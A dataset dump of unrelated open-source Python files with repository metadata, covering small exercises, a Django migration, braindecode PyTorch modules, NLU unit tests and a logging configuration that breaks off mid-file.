f8b82507e3b52ddf92cdc39752e6e581f4a584b7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03036/s201107725.py | 1af652533bcb364e1fcefd93bc68c188b9e1c8a1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | def mass(r, D, x):
return r*x - D
# Read ratio r, decrement D and the seed x from one line of stdin, then
# print the value after each of 10 applications of the recurrence.
r, D, x = map(int, input().split())
for _ in range(10):
    x = mass(r, D, x)
    print(x)
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
63bc0d71d7cde2d387dd3fb81c3b8f9c797a1e07 | fac51719e067ee2a70934e3bffdc98802d6dbb35 | /src/stronghold/rosalind_fibd.py | ebae89a00d6c3c43b933588319bfb333d3363c14 | [
"MIT"
] | permissive | cowboysmall-comp/rosalind | 37730abdd03e86a2106ef39b39cdbae908f29e6e | 021e4392a8fc946b97bbf86bbb8227b28bb5e462 | refs/heads/master | 2022-03-05T14:30:21.020376 | 2019-11-20T02:03:09 | 2019-11-20T02:03:09 | 29,898,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../tools'))
import files
import combinatorics
def main(argv):
    """Solve Rosalind FIBD (mortal Fibonacci rabbits).

    argv[0] is the path to a file whose single line holds two integers:
    n (months to simulate) and m (rabbit lifespan in months). Prints the
    resulting population count.
    """
    n, m = files.read_line_of_ints(argv[0])
    print combinatorics.fibonacci_with_mortality(n, m)
if __name__ == "__main__":
    main(sys.argv[1:])
| [
"jerry@cowboysmall.com"
] | jerry@cowboysmall.com |
cb8b62f68af536bf53106f52a181962b4a62d27e | f76e11d4da15768bf8683380b1b1312f04060f9a | /lex_dep_conll_randomly.py | 91cf5c46bb79db6faaa0d519b070f648911847b0 | [] | no_license | rasoolims/scripts | 0804a2e5f7f405846cb659f9f8199f6bd93c4af6 | fd8110558fff1bb5a7527ff854eeea87b0b3c597 | refs/heads/master | 2021-07-07T03:53:20.507765 | 2021-04-13T14:53:00 | 2021-04-13T14:53:00 | 24,770,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,807 | py | import os,sys,codecs,random
from mst_dep_tree_loader import DependencyTree
from collections import defaultdict
from random import randint
def read_grams(file_path):
reader = codecs.open(file_path,'r')
bigrams = defaultdict(list)
trigrams = defaultdict(list)
unigrams = defaultdict(list)
line = reader.readline()
while line:
spl = line.strip().split('\t')
if spl[0]=='bigram':
bigrams[spl[1]].append(spl[2])
elif spl[0] == 'trigram':
trigrams[spl[1]].append(spl[2])
elif spl[0] == 'unigram':
unigrams[spl[1]].append(spl[2])
line = reader.readline()
print len(bigrams)
print len(trigrams)
return [bigrams,trigrams,unigrams]
# argv: [1] input CoNLL treebank, [2] n-gram table file, [3] output path.
trees = DependencyTree.load_trees_from_conll_file(os.path.abspath(sys.argv[1]))
x_pair = read_grams(os.path.abspath(sys.argv[2]))
bigrams = x_pair[0]
trigrams = x_pair[1]
unigrams = x_pair[2]
# NOTE(review): writer is never closed or flushed explicitly; output
# relies on interpreter exit. Consider closing it when revising.
writer = codecs.open(os.path.abspath(sys.argv[3]),'w')
for tree in trees:
    # Pad the POS tag sequence with two sentence boundary markers on each
    # side so every position has a full 5-tag context window.
    t = ['<s>','<s>']+list(tree.tags)+['</s>','</s>']
    # NOTE(review): ``b`` and ``lex_set`` are assigned but never used.
    b = 0 # random.randint(0,1)
    lex_set = set()
    for i in range(0,1):
        # Pick one random token position (in padded coordinates) and
        # build the 5-tag context strings for it and for its head.
        r = random.randint(2,len(t)-3)
        dep_context = ' '.join(t[r-1:r+4])
        head = tree.heads[r-2]
        if head>0:
            #print head, len(t)
            head_context = ' '.join(t[head-1:head+4])
            #print t
            #print head
            #print head_context
            # Replace both tokens with random words drawn from the same
            # tag contexts (has_key: this file is Python 2).
            if unigrams.has_key(head_context) and unigrams.has_key(dep_context):
                head_cand = random.randint(0,len(unigrams[head_context])-1)
                head_word = unigrams[head_context][head_cand]
                dep_cand= random.randint(0,len(unigrams[dep_context])-1)
                dep_word = unigrams[dep_context][dep_cand]
                tree.words[r-2] = dep_word
                tree.words[head-1] = head_word
            #else:
                #print '--> found',head_context,'=======',dep_context
            else:
                print 'not found',head_context,'=======',dep_context
        writer.write(tree.conll_str()+'\n\n')
"rasooli.ms@gmail.com"
] | rasooli.ms@gmail.com |
f3a17057535a5470347aec5d7e9082c1fba794a3 | 1f1e8b335470065b67cce28338cfb4a6da503c95 | /0x03-python-data_structures/9-max_integer.py | 1036fa892e7ca0e930e4e0fb28fac2535bc40339 | [] | no_license | guxal/holbertonschool-higher_level_programming | 48353071e719a509e10f3067f0c3f88cb44bd27d | fffd287c510602dc45e36df486f60cdfa1205335 | refs/heads/master | 2020-07-22T23:40:03.266880 | 2020-02-14T02:42:11 | 2020-02-14T02:42:11 | 207,370,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | #!/usr/bin/python3
def max_integer(my_list=[]):
    """Return the largest value in ``my_list``, or ``None`` if it is empty.

    The shared mutable default is safe here because the list is never
    mutated, and keeping it preserves the original signature.
    """
    # The original used `len(my_list) is 0`: an identity comparison on an
    # int, which only works due to CPython's small-int caching. Use
    # truthiness instead.
    if not my_list:
        return None
    _max = my_list[0]
    # Iterate the list directly; the original's my_list[:] copy was an
    # unnecessary allocation.
    for item in my_list:
        if item > _max:
            _max = item
    return _max
| [
"jonathanacp93@gmail.com"
] | jonathanacp93@gmail.com |
13a53613fcd588305d4af4cf3127fd1af004d65c | ba744a96d4c8fbcbaa15bcdbc5c3efe3860578b7 | /apps/trade/migrations/0001_initial.py | f030621112e685196238e8bb53928904d33295b9 | [] | no_license | zhangliang852469/Mx_shop_afterend | d84107887936baf122ed489de766f5d22958865b | 9d04de806d6ec87778f2ebe002459ee6a854915e | refs/heads/master | 2022-12-17T21:03:21.315285 | 2019-06-18T09:49:51 | 2019-06-18T09:49:51 | 192,023,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,744 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2019-06-13 07:36
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the trade app.

    Creates the OrderGoods, OrderInfo and ShoppingCart models; depends on
    the goods app's initial migration because ShoppingCart has a foreign
    key to goods.Goods.
    """
    initial = True
    dependencies = [
        ('goods', '0001_initial'),
    ]
    operations = [
        # Per-order line items: quantity of a goods entry.
        migrations.CreateModel(
            name='OrderGoods',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('add_time', models.DateTimeField(auto_now_add=True, verbose_name='添加时间')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
                ('is_delete', models.BooleanField(default=False, verbose_name='是否删除')),
                ('goods_num', models.IntegerField(default=0, verbose_name='商品数量')),
            ],
            options={
                'verbose_name': '订单商品',
                'verbose_name_plural': '订单商品',
            },
        ),
        # Order header: payment state, amounts and delivery details.
        migrations.CreateModel(
            name='OrderInfo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('add_time', models.DateTimeField(auto_now_add=True, verbose_name='添加时间')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
                ('is_delete', models.BooleanField(default=False, verbose_name='是否删除')),
                ('order_sn', models.CharField(blank=True, max_length=30, null=True, unique=True, verbose_name='订单号')),
                ('trade_no', models.CharField(blank=True, max_length=100, null=True, unique=True, verbose_name='交易号')),
                ('pay_status', models.CharField(choices=[('TRADE_SUCCESS', '成功'), ('TRADE_CLOSED', '超时关闭'), ('WAIT_BUYER_PAY', '交易创建'), ('TRADE_FINISHED', '交易结束'), ('paying', '待支付')], default='paying', max_length=30, verbose_name='订单状态')),
                ('post_script', models.CharField(max_length=200, verbose_name='订单留言')),
                ('order_mount', models.FloatField(default=0.0, verbose_name='订单金额')),
                ('pay_time', models.DateTimeField(blank=True, null=True, verbose_name='支付时间')),
                ('address', models.CharField(default='', max_length=100, verbose_name='收货地址')),
                ('signer_name', models.CharField(default='', max_length=20, verbose_name='签收人')),
                ('singer_mobile', models.CharField(max_length=11, verbose_name='联系电话')),
            ],
            options={
                'verbose_name': '订单',
                'verbose_name_plural': '订单',
            },
        ),
        # Shopping cart entry: a goods reference plus desired quantity.
        migrations.CreateModel(
            name='ShoppingCart',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('add_time', models.DateTimeField(auto_now_add=True, verbose_name='添加时间')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
                ('is_delete', models.BooleanField(default=False, verbose_name='是否删除')),
                ('nums', models.IntegerField(default=0, verbose_name='购买数量')),
                ('goods', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.Goods', verbose_name='商品')),
            ],
            options={
                'verbose_name': '购物车',
                'verbose_name_plural': '购物车',
            },
        ),
    ]
| [
"710567585@qq.com"
] | 710567585@qq.com |
ca921fc2fbaabafea8ea8a27c3a5c456d9de049e | fa93e53a9eee6cb476b8998d62067fce2fbcea13 | /build/pal_simulation_msgs/catkin_generated/pkg.develspace.context.pc.py | ef59934517d574ec416e392bcf9c47a693ac42db | [] | no_license | oyetripathi/ROS_conclusion_project | 2947ee2f575ddf05480dabc69cf8af3c2df53f73 | 01e71350437d57d8112b6cec298f89fc8291fb5f | refs/heads/master | 2023-06-30T00:38:29.711137 | 2021-08-05T09:17:54 | 2021-08-05T09:17:54 | 392,716,311 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Values below are substituted into catkin's pkg-config template for the
# develspace build of this package; they are machine-generated constants.
CATKIN_PACKAGE_PREFIX = ""
# Exported include directories (semicolon-separated in the template; empty -> []).
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/sandeepan/tiago_public_ws/devel/.private/pal_simulation_msgs/include".split(';') if "/home/sandeepan/tiago_public_ws/devel/.private/pal_simulation_msgs/include" != "" else []
# Catkin dependencies, space-separated for the pkg-config "Requires" field.
PROJECT_CATKIN_DEPENDS = "geometry_msgs;message_generation".replace(';', ' ')
# Libraries exported by this package (none here).
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "pal_simulation_msgs"
# Root of this package's develspace.
PROJECT_SPACE_DIR = "/home/sandeepan/tiago_public_ws/devel/.private/pal_simulation_msgs"
PROJECT_VERSION = "0.13.4"
| [
"sandeepan.ghosh.ece20@itbhu.ac.in"
] | sandeepan.ghosh.ece20@itbhu.ac.in |
5f674d770f55421b0aea0d1f856866842bd347bc | 5b3090dece7d3d276922f53bfba18fdff3a5ba12 | /app/res/language/chinese.py | e1f1e471b598aca0a8ca550835d409bc133ca151 | [
"MIT"
] | permissive | HsOjo/PyJSONEditor | 338978b36a545982bec7285ba1de9aa5704f39b0 | c2cf5398fa569ba0575048f3deebbf23028a61a1 | refs/heads/master | 2020-06-30T00:35:40.215143 | 2019-10-15T11:27:01 | 2019-10-15T11:27:01 | 200,668,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,023 | py | from .english import English
class Chinese(English):
    """Simplified-Chinese string table; unset entries fall back to English."""
    # Name of this language, written in the language itself.
    l_this = '简体中文'
    # Generic UI strings ('%s' is filled with the offending content).
    unknown = '未知内容: (%s)'
    cancel = '取消'
    ok = '确定'
    preferences = '偏好设置'
    untitled = '未命名'
    # Tree-node labels ('%d 个%s' formats a count plus an item word).
    node_root = '根节点'
    node_item = '项目'
    node_items = '项目'
    node_none = '(无)'
    node_num = '(%d 个%s)'
    # Column headers.
    col_key = '键'
    col_type = '类型'
    col_value = '值'
    # "File" menu entries.
    menu_file = '文件'
    menu_new_file = '新建文件'
    menu_open_file = '打开文件'
    menu_save_file = '保存文件'
    menu_save_file_as = '另存为...'
    menu_save_file_all = '保存全部'
    menu_close_file = '关闭文件'
    # "Edit" menu entries.
    menu_edit = '编辑'
    menu_undo = '撤销'
    menu_redo = '重做'
    menu_cut = '剪切'
    menu_copy = '复制'
    menu_paste = '粘贴'
    menu_find = '查找'
    menu_replace = '替换'
    # "View" menu entries.
    menu_view = '视图'
    menu_previous_file = '上一个文件'
    menu_next_file = '下一个文件'
    menu_languages = '选择语言'
| [
"1134031392@qq.com"
] | 1134031392@qq.com |
a6e1433feed00f513880cc74887b39790b9279f6 | 6f255449d5790a1124ca56bec0e3dc457c1b3958 | /final-exam/z5103095.files/question_1.py | 8d913a44608897cd62ed013f3c4b56efdd012829 | [] | no_license | tomtang110/comp9021 | ac8995f3f558ffdfff7af76a08c67e208fe26aa4 | 6c9e6404f515a72bc94a185c1c98d5aba49266c8 | refs/heads/master | 2020-03-23T18:56:41.177586 | 2018-07-24T04:56:23 | 2018-07-24T04:56:23 | 141,943,053 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,854 | py | from random import seed, randint
import sys
def f(arg_for_seed, nb_of_elements, max_element):
    '''
    Print a random list L of nb_of_elements integers drawn from
    [0, max_element] (seeded with arg_for_seed), then print L's
    decomposition into maximal runs of consecutive even numbers.

    >>> f(0, 0, 10)
    Here is L: []
    The decomposition of L into longest sublists of even numbers is: []
    >>> f(0, 1, 10)
    Here is L: [6]
    The decomposition of L into longest sublists of even numbers is: [[6]]
    >>> f(0, 2, 10)
    Here is L: [6, 6]
    The decomposition of L into longest sublists of even numbers is: [[6, 6]]
    >>> f (0, 2, 2)
    Here is L: [1, 1]
    The decomposition of L into longest sublists of even numbers is: []
    >>> f(1, 2, 10)
    Here is L: [2, 9]
    The decomposition of L into longest sublists of even numbers is: [[2]]
    >>> f(1, 4, 10)
    Here is L: [2, 9, 1, 4]
    The decomposition of L into longest sublists of even numbers is: [[2], [4]]
    >>> f(1, 8, 8)
    Here is L: [2, 1, 4, 1, 7, 7, 7, 6]
    The decomposition of L into longest sublists of even numbers is: [[2], [4], [6]]
    >>> f(1, 10, 20)
    Here is L: [4, 18, 2, 8, 3, 15, 14, 15, 20, 12]
    The decomposition of L into longest sublists of even numbers is: [[4, 18, 2, 8], [14], [20, 12]]
    '''
    # A negative element count is invalid; the original spec aborts.
    if nb_of_elements < 0:
        sys.exit()
    seed(arg_for_seed)
    L = [randint(0, max_element) for _ in range(nb_of_elements)]
    print('Here is L:', L)
    R = []
    current_run = []
    for i in L:
        if i % 2 == 0:
            # Extend the current run of even numbers.
            current_run.append(i)
        elif current_run:
            # An odd number terminates a non-empty run.
            R.append(current_run)
            current_run = []
        else:
            # Odd number with no open run: nothing to flush.
            current_run = []
    # Flush a run that extends to the end of the list.
    if current_run:
        R.append(current_run)
    print('The decomposition of L into longest sublists of even numbers is:', R)
if __name__ == '__main__':
    # When run as a script, execute the doctests embedded in f's docstring.
    import doctest
    doctest.testmod()
| [
"tomtang110@outlook.com"
] | tomtang110@outlook.com |
336358a0ad3cb966e795d63dcf4df7dc65bebfd0 | b4ddc954a7dc0d24352de64a567c10c9e7231eee | /LeetCode/Find_The_Highest_Altitude.py | 5aa48147d753e47d66b4ede34758f663c816763b | [] | no_license | sharadbhat/Competitive-Coding | 4d80c99093bf05a2213799c95467309cf3e40d07 | 79eec04cc6b1ac69295530bda1575ecb613a769e | refs/heads/master | 2023-07-05T02:25:33.397140 | 2023-06-27T05:38:12 | 2023-06-27T05:38:12 | 78,031,600 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | # Leetcode
# https://leetcode.com/problems/find-the-highest-altitude/
class Solution:
    def largestAltitude(self, gain: List[int]) -> int:
        """Return the highest altitude reached while starting at 0 and
        applying each net gain in order; never below the start altitude."""
        altitude = 0
        highest = 0
        for delta in gain:
            altitude += delta
            if altitude > highest:
                highest = altitude
        return highest
| [
"sharad.mbhat@gmail.com"
] | sharad.mbhat@gmail.com |
79e334c49ed3d3a075006d71c996f566dcc982ef | 2c4efe2ce49a900c68348f50e71802994c84900a | /braindecode-master/braindecode/torch_ext/modules.py | 57a1d4161d2312d7d0d5b863cd63e97d67fa9f82 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | sisi2/Masterthesis | b508632526e82b23c2efb34729141bfdae078fa0 | 7ce17644af47db4ad62764ed062840a10afe714d | refs/heads/master | 2022-11-19T15:21:28.272824 | 2018-08-13T15:02:20 | 2018-08-13T15:02:20 | 131,345,102 | 2 | 1 | null | 2022-11-15T14:08:07 | 2018-04-27T21:09:21 | Python | UTF-8 | Python | false | false | 4,098 | py | import numpy as np
import torch
import torch.nn.functional as F
from braindecode.torch_ext.util import np_to_var
class Expression(torch.nn.Module):
    """
    Apply an arbitrary callable during the forward pass.

    Parameters
    ----------
    expression_fn: function
        Callable accepting any number of `torch.autograd.Variable`
        arguments and producing the module's output.
    """
    def __init__(self, expression_fn):
        super(Expression, self).__init__()
        self.expression_fn = expression_fn

    def forward(self, *x):
        # Delegate straight to the wrapped callable.
        return self.expression_fn(*x)

    def __repr__(self):
        # Objects exposing `func`/`kwargs` (partial-like) show both pieces;
        # anything else is identified by its __name__.
        fn = self.expression_fn
        if hasattr(fn, 'func') and hasattr(fn, 'kwargs'):
            expression_str = "{:s} {:s}".format(
                fn.func.__name__, str(fn.kwargs))
        else:
            expression_str = fn.__name__
        return "{:s}({:s}{:s})".format(
            self.__class__.__name__, 'expression=', str(expression_str))
class AvgPool2dWithConv(torch.nn.Module):
    """
    Average pooling realised as a grouped convolution, so that a dilation
    parameter is available.

    Parameters
    ----------
    kernel_size: (int,int)
        Size of the pooling region.
    stride: (int,int)
        Stride of the pooling operation.
    dilation: int or (int,int)
        Dilation applied to the pooling filter.
    """
    def __init__(self, kernel_size, stride, dilation=1):
        super(AvgPool2dWithConv, self).__init__()
        self.kernel_size = kernel_size
        self.stride = stride
        self.dilation = dilation
        # Averaging filter; built lazily in forward() once the input
        # shape/device/dtype are known.
        self.weights = None

    def forward(self, x):
        n_channels = x.size()[1]
        weight_shape = (n_channels, 1,
                        self.kernel_size[0], self.kernel_size[1])
        # The cached filter is stale when its shape, CUDA placement or
        # dtype no longer matches the incoming tensor.
        stale = (
            self.weights is None
            or tuple(self.weights.size()) != tuple(weight_shape)
            or self.weights.is_cuda != x.is_cuda
            or self.weights.data.type() != x.data.type()
        )
        if stale:
            n_pool = np.prod(self.kernel_size)
            # Uniform weights 1/|kernel| implement the mean.
            weights = np_to_var(
                np.ones(weight_shape, dtype=np.float32) / float(n_pool))
            weights = weights.type_as(x)
            if x.is_cuda:
                weights = weights.cuda()
            self.weights = weights
        # groups=n_channels applies one filter per channel independently.
        return F.conv2d(x, self.weights, bias=None, stride=self.stride,
                        dilation=self.dilation, groups=n_channels)
class IntermediateOutputWrapper(torch.nn.Module):
    """Wrap a network so forward() returns chosen intermediate activations.

    forward() runs the wrapped model's children in order and collects the
    output of every child whose name appears in `to_select`.

    Parameters
    ----------
    to_select : list
        Names of the child modules whose activations should be returned.
    model : model object
        Network whose named children are re-registered on this wrapper.

    Examples
    --------
    >>> model = Deep4Net()
    >>> select_modules = ['conv_spat','conv_2','conv_3','conv_4'] # Specify intermediate outputs
    >>> model_pert = IntermediateOutputWrapper(select_modules,model) # Wrap model
    """
    def __init__(self, to_select, model):
        # Selection is by name, so every child must carry a name.
        if not len(list(model.children())) == len(list(model.named_children())):
            raise Exception('All modules in model need to have names!')
        super(IntermediateOutputWrapper, self).__init__()
        for name, child in model.named_children():
            self.add_module(name, child)
            self._modules[name].load_state_dict(child.state_dict())
        self._to_select = to_select

    def forward(self, x):
        # Feed x through the children sequentially, keeping selected outputs.
        collected = []
        for name, child in self._modules.items():
            x = child(x)
            if name in self._to_select:
                collected.append(x)
        return collected
| [
"dansyefila@gmail.com"
] | dansyefila@gmail.com |
c4fe238528f8bb4be22c782626032f888f42d1e7 | 74f8d8c8030ce0c8cd3622cb99f0a668ba93a7e8 | /dialogue-engine/test/programytest/aiml_tests/nlu_tests/test_nlu_slot.py | 0b797c7c29de2c01824c888d826a4eee3e344040 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Tommytosik/cotoba-agent-oss | 3124a376ac0ca1147a58405a8f269a0eb68bc014 | 78e5c2c244b92e71755783d972228904c4d0d373 | refs/heads/master | 2022-12-08T15:44:27.731731 | 2020-08-04T08:36:41 | 2020-08-04T08:36:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,774 | py | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import os
import json
from src.programy.nlu.nlu import NluRequest
from src.programy.storage.stores.file.store.config import FileStoreConfiguration
from src.programy.storage.factory import StorageFactory
from programytest.client import TestClient
class DummyNlu(NluRequest):
    """Stub NLU backend returning one fixed 'transportation' intent.

    The ``apikey`` argument is repurposed as the intent score so each test
    case can steer which category branch matches.
    """
    def set_request_api(self, api):
        # Nothing to configure for the stub.
        pass

    def nluCall(self, client_context, url, apikey, utternce):
        """Return a canned NLU JSON payload with ``apikey`` spliced in as
        the intent score; the text is round-tripped through json so the
        result is normalised JSON."""
        nlu_result_a = """{
            "intents": [
                {"intent": "transportation", "score":
        """
        nlu_result_b = """}
            ],
            "slots": [
                {"slot": "departure", "entity": "東京", "score": 0.85, "startOffset": 3, "endOffset": 5 },
                {"slot": "arrival", "entity": "京都", "score": 0.86, "startOffset": 8, "endOffset": 10 }
            ]
        }
        """
        nlu_result = nlu_result_a + ' ' + apikey + nlu_result_b
        # json.loads no longer accepts an `encoding` argument (removed in
        # Python 3.9; it was ignored for str input before that).
        json_data = json.loads(nlu_result)
        result = json.dumps(json_data)
        return result
class NluSlotTestClient(TestClient):
    """Test client that loads a local AIML grammar and wires in DummyNlu.

    ``score`` is stored and forwarded to the NLU configuration as the API
    key, which the DummyNlu stub in this module reuses as the intent score.
    """
    def __init__(self, aiml_file, score):
        self._aiml_file = aiml_file
        self._score = score
        TestClient.__init__(self)
    def load_storage(self):
        # Start from the default storage layout, then point the category
        # store at the AIML file sitting next to this test module.
        super(NluSlotTestClient, self).load_storage()
        self.add_default_stores()
        aimlfile = os.path.dirname(__file__) + os.sep + self._aiml_file
        self._file_store_config._categories_storage = FileStoreConfiguration(dirs=aimlfile, format="xml", extension="aiml", encoding="utf-8", delete_on_start=False)
        self.storage_factory._storage_engines[StorageFactory.CATEGORIES] = self._storage_engine
        self.storage_factory._store_to_engine_map[StorageFactory.CATEGORIES] = self._storage_engine
        # Route the first brain's NLU calls to the DummyNlu stub, passing
        # the requested score through the apikey field.
        bot_config = self.configuration.client_configuration.configurations[0]
        brain_config = bot_config._brain_configs[0]
        brain_config.nlu._classname = 'programytest.aiml_tests.nlu_tests.test_nlu_slot.DummyNlu'
        brain_config.nlu._url = 'http://test_nlu.co.jp'
        brain_config.nlu._apikey = self._score
        brain_config.nlu._use_file = False
class NluSlotTests(unittest.TestCase):
    """Exercise <nluslot> handling against the DummyNlu stub.

    Every case loads the same grammar ('nlu_slot.aiml') with a different
    score string, which selects a different category branch; public test
    method names are kept unchanged (including historical misspellings).
    """

    def _assert_nlu_response(self, score, expected):
        # Build a fresh client whose NLU stub reports `score`, ask the
        # trigger question and compare against the expected answer.
        client = NluSlotTestClient('nlu_slot.aiml', score)
        self._client_context = client.create_client_context("testid")
        self.assertIsNotNone(self._client_context.brain.nlu)
        response = self._client_context.bot.ask_question(self._client_context, "Match NLU")
        self.assertIsNotNone(response)
        self.assertEqual(response, expected)

    def test_nluslot(self):
        self._assert_nlu_response('0.9', "NLU result東京.")

    def test_nluslot_with_tag(self):
        self._assert_nlu_response('0.8', "NLU result東京.")

    def test_nluslot_with_index(self):
        self._assert_nlu_response('0.7', "NLU result unknown.")

    def test_nluslot_wildcard(self):
        self._assert_nlu_response('0.6', "NLU result東京.")

    def test_nluslot_widcard_with_index(self):
        self._assert_nlu_response('0.5', "NLU result京都.")

    def test_nluslot_invlid_name(self):
        self._assert_nlu_response('0.4', "NLU result unknown.")
| [
"cliff@cotobadesign.com"
] | cliff@cotobadesign.com |
019cbaa07ad0766032c2a89bc17316db464fda96 | fc20620a1fe41c83cb4c17ce36e5d3e6d5dd58fa | /src/python/dicomifier/bruker_to_dicom/modules/__init__.py | 8505c3863b861b74d2df358cc07af97daa8ae843 | [
"LicenseRef-scancode-cecill-b-en"
] | permissive | lamyj/dicomifier | bdd3ad5756563365fe59a31166cbcaa14f98603f | 8601760917f7ef47d87fbd61d2c647c3d9cbeb3e | refs/heads/master | 2023-04-28T15:45:52.571809 | 2023-04-20T15:50:03 | 2023-04-20T15:50:03 | 32,533,252 | 33 | 11 | NOASSERTION | 2022-09-12T16:53:20 | 2015-03-19T16:28:40 | Python | UTF-8 | Python | false | false | 763 | py | #########################################################################
# Dicomifier - Copyright (C) Universite de Strasbourg
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
#########################################################################
def cached(key):
    """ Cache the results of a conversion in the data set.

    The decorated converter is called at most once per data set ``d``;
    afterwards the stored value under ``key`` is returned directly.
    """
    def decorate(function):
        def memoised(d, g, i):
            # EAFP: a hit is the common case after the first call.
            try:
                return d[key]
            except KeyError:
                value = function(d, g, i)
                d[key] = value
                return value
        return memoised
    return decorate
from . import equipment, frame_of_reference, image, mr, patient, series, study
| [
"lamy@unistra.fr"
] | lamy@unistra.fr |
834701c6886d9fc50ad7caaac9114177ec009c26 | cfb4e8721137a096a23d151f2ff27240b218c34c | /mypower/matpower_ported/lib/t/t_scale_load.py | cfcda91b7bde4b86375aa3eeedd50b764ef7a0b3 | [
"Apache-2.0"
def t_scale_load(*args, nout=3, oc=None):
    """Forward to the Octave-backed MATPOWER t_scale_load.

    Parameters
    ----------
    *args : positional arguments forwarded unchanged to Octave.
    nout : number of output values requested (default 3).
    oc : existing oc_matpower session; created on demand when omitted.
    """
    # Identity check, not equality: `== None` can be hijacked by __eq__.
    if oc is None:
        # Deferred import so importing this module does not start Octave.
        from ....oc_matpower import oc_matpower
        oc = oc_matpower()
    return oc.t_scale_load(*args, nout=nout)
| [
"muhammadyasirroni@gmail.com"
] | muhammadyasirroni@gmail.com |
fc55491fbed4cacbf6017d6389f90e8d5df11cb8 | 6534d071078db552573aa7ad7fd66c6beba15f35 | /rexlex/log_config.py | bd5fdccc5e69dda40c0cdb90e7422d3f05e81111 | [
"BSD-3-Clause"
] | permissive | twneale/rexlex | 7f40f4db30485d409ec5ceea3fb1053cbdf81e95 | 6c451a3b7e9134cbdf895a7ec5682e480480ef1a | refs/heads/master | 2021-01-20T11:06:17.888743 | 2017-01-22T03:59:14 | 2017-01-22T03:59:14 | 18,271,416 | 1 | 1 | BSD-3-Clause | 2018-03-05T00:40:18 | 2014-03-30T19:11:41 | Python | UTF-8 | Python | false | false | 7,091 | py | '''
Establish custom log levels for rexlexer's verbose output.
'''
import logging
from rexlex.config import LOG_MSG_MAXWIDTH
# ---------------------------------------------------------------------------
# Establish custom log levels.
# ---------------------------------------------------------------------------
# Used to report tokens getting yielded.
REXLEX_TRACE_RESULT = 9
# Used to report starting, stopping, etc.
REXLEX_TRACE_META = 8
# Used to report changes to lexer state.
REXLEX_TRACE_STATE = 7
# Used to report on specific rules.
REXLEX_TRACE_RULE = 6
# Used to dump as much info as possible.
REXLEX_TRACE = 5
# (numeric level, registered level name, Logger method name) triples. All
# levels sit below logging.DEBUG (10), so they appear only at very verbose
# settings; the method-name column is used by the Logger patching below.
REXLEX_LOG_LEVELS = (
    (REXLEX_TRACE_RESULT, 'REXLEX_TRACE_RESULT', 'rexlex_trace_result'),
    (REXLEX_TRACE_META, 'REXLEX_TRACE_META', 'rexlex_trace_meta'),
    (REXLEX_TRACE_STATE, 'REXLEX_TRACE_STATE', 'rexlex_trace_state'),
    (REXLEX_TRACE_RULE, 'REXLEX_TRACE_RULE', 'rexlex_trace_rule'),
    (REXLEX_TRACE, 'REXLEX_TRACE', 'rexlex_trace'),
)
# Teach the logging module the symbolic names for the custom levels.
for loglevel, loglevel_name, method_name in REXLEX_LOG_LEVELS:
    logging.addLevelName(loglevel, loglevel_name)
# One convenience method per custom level, attached to logging.Logger so
# callers can write logger.rexlex_trace_*(...). Each mirrors the shape of
# Logger.debug/info: log only when the level is enabled for this logger.
